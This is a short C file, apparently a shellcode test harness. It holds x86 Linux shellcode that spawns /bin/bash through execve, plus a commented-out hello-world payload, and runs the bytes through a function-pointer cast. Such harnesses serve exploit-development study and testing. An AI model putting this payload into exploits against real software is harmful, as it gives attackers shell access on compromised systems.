#include <stdio.h>
#include <string.h>


unsigned char code[] = \
//"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
//"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x72\x6c\x64\x00\x68\x6f\x20\x57\x6f\x68\x48\x65\x6c\x6c\x89\xe1\xb0\x04\xb3\x01\xb2\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
 

int main() {
	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;
	ret();
}
